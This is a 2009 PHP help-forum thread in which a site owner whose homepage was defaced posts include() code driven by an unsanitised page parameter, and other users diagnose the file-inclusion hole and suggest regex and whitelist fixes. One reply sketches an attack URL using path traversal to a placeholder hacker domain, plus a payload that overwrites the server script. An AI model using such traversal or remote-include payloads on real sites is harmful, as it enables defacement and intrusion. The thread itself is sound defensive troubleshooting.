Page 1 of 1

PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 2:35 pm
by 110%Nutter
Hi, I went to look at my website last night and found that my homepage had been replaced by something created by some muslim albanian / kosovo hackers.

I would be interested in hearing from any of you who could pin point the weak spot in my code, I'm pretty new to php so its likely there are some newbie errors in it that let them in!!

Hope to hear from someone soon!!

Code: Select all

 
<?php
    //loop through the files and see whats there
    $exts = array("php","htm","html");
    $got = 0;
    $folder = "/home/rayj/public_html/pages/";
    if ($_GET["page"] == "") $_GET["page"] = "home/home";
    $page = $folder . $_GET["page"];
    foreach ($exts as $ext) {
        if (file_exists($page . "." . $ext)) {
            $got = $page . "." . $ext;
            break;
        }
    }
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>Chris Ray | <?php
        // read the title file and use its contents to name the page
        if (!$got) {
            echo "Page not found...";
        } else if (file_exists($page . ".title")) {
            include ($page . ".title");
        } else {
            echo $_GET["page"];
        }
    ?></title>
    
    <?php
    //include java script files
        if (file_exists($page . ".js")) {
            echo "<script language=\"javascript\">";
            include ($page . ".js");
            echo "</script>";
        }
    ?>
    
    <?php
    //include meta data files
        if (file_exists($page . ".meta")) {
            include ($page . ".meta");
        }
    ?>
    
    <link href="stylesheet.css" rel="stylesheet" type="text/css"/>
    <link rel="shortcut icon" href="assets/favicon.ico"/>
    <link rel="stylesheet" href="assets/cbcscbindex.css" type="text/css" /> 
</head>
<body>
    <div id="top_bg">           
        </div>
        <div id="menu">
            <div id="menu_items">
                <ul id="ebul_cbindex_3" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=services/raid_calculator/raid_calculator" title="">Raid Calculator</a></li>
                    <li><a href="?page=services/web_hosting/web_hosting" title="">Web Hosting</a></li>
                </ul>           
                <ul id="ebul_cbindex_4" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=about_me/me/me" title="">Me</a></li>
                    <li><a href="?page=about_me/get_in_touch/get_in_touch" title="">Get In Touch</a></li>
                </ul>
                <ul id="cbindexebul_table" class="cbindexebul_menulist" style="width: 350px; height: 30px;">
                    <li class="spaced_li"><a href="?page=home/home"><img id="cbi_cbindex_1" src="assets/ebbtcbindex1_0.png" name="ebbcbindex_1" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Home" title="" /></a></li>
                    <li class="spaced_li"><a href="?page=projects/projects"><img id="cbi_cbindex_2" src="assets/ebbtcbindex2_0.png" name="ebbcbindex_2" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Projects" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_3" src="assets/ebbtcbindex3_0.png" name="ebbcbindex_3" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Services" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_4" src="assets/ebbtcbindex4_0.png" name="ebbcbindex_4" width="70" height="30" style="vertical-align: bottom;" border="0" alt="About Me" title="" /></a></li>
                    <li><a href="?page=uni/uni"><img id="cbi_cbindex_5" src="assets/ebbtcbindex5_0.png" name="ebbcbindex_5" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Uni" title="" /></a></li>
                </ul><!-- number 7 test when page missing show error message-->
                <script type="text/javascript" src="assets/cbjscbindex.js"></script>
            </div>
        </div>
        <div id="middle_bg">
            <div id="content">
                <?php
                    if (!$got) {
                        echo "Page not found...";
                    } else {
                        include($got);
                    }
                ?>
            </div>
        <div id="footer">
            <p>Designed by Chris Ray &copy; 2009 <a href="http://validator.w3.org/check?uri=http%3A%2F%2Fwww.rayjchris.co.uk%2F">XHTML</a> | <a href="http://jigsaw.w3.org/css-validator/validator?uri=www.rayjchris.co.uk&profile=css21&usermedium=all&warning=1">CSS</a></p>
        </div>  
    </div>          
    <div id="bottom_bg">
    </div>
</body>
</html>
 

Re: PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 6:14 pm
by tr0gd0rr
You are including a file with a name based on unscrubbed content in $_GET in the "include($got)" line.

I'm not exactly sure, but I think you can do something like:
http:// domain.com/?page=../../../../http://hacker-domain.com/exploiter.txt

Where exploter.txt contains something like the following:

Code: Select all

<?php
$php = '<?php echo "pwnd" ?>';
file_put_contents($_SERVER['SCRIPT_FILENAME'], $php);
You should never include files or perform exec() based on unscrubbed user-submitted content.

You could probably run a preg_match() to ensure that $_GET['page'] contains only letters, numbers, slashes for example.

You could also check that the page is within your specified directory (untested):

Code: Select all

$safe = false;
$dirname = rtrim($got, '/');
while (($dirname = dirname($dirname)) {
  if ($dirname == $folder) {
    $safe = true;
    break;
  }
}
if (!$safe) {
 $got = $folder . '404.php';
}

Re: PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 7:30 pm
by 110%Nutter
You had an interesting theory i gave the ?page=../../ a test but that was stopped with the following error

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/home/rayj/public_html/pages

Lines 2 to 15 in my code do something similar to the file location existence checking you were talking about, I'm not sure if yours takes that idea one step further? would it be worth adding them together?

could you give me an example of preg_match?

Thanks for your help!!

Re: PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 10:14 pm
by tr0gd0rr
ah yes--open_basedir

The regex would be something like:

Code: Select all

if (preg_match('~[^\w/_-]~', $page)) {
  // not safe
}
 
 
And yes, file_exists will ensure that the file exists, but it will not ensure that the file is within your base directory.

I'll look into some other possible exploits; this is interesting.

Re: PHP Exploit BUT HOW?

Posted: Sat Aug 15, 2009 2:23 am
by kaisellgren
You probably got some other vulnerable scripts there, too. Easiest way to safely include files like that would be to use white listing:

Code: Select all

$files = array('home.php','contact.php');
if (!in_array($_GET['page'],$files))
 include('404.php');
else
 include($_GET['page']);
No one can now manipulate your inclusions.